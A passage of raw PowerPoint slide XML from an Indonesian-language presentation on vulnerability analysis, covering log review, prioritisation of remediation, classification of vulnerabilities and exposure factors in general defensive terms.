              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengungkapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>entri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>minggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terakhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Entri </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kasus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relevan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfirmasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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193</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404569654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Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aspek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penentuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prioritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klasifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksposur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penentuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>prioritas</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kritis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penentuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prioritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor-faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keparahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfokuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dahulu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Klasifikasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klasifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkategorikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakteristiknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpengaruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Klasifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperjelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Faktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keterpaparan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
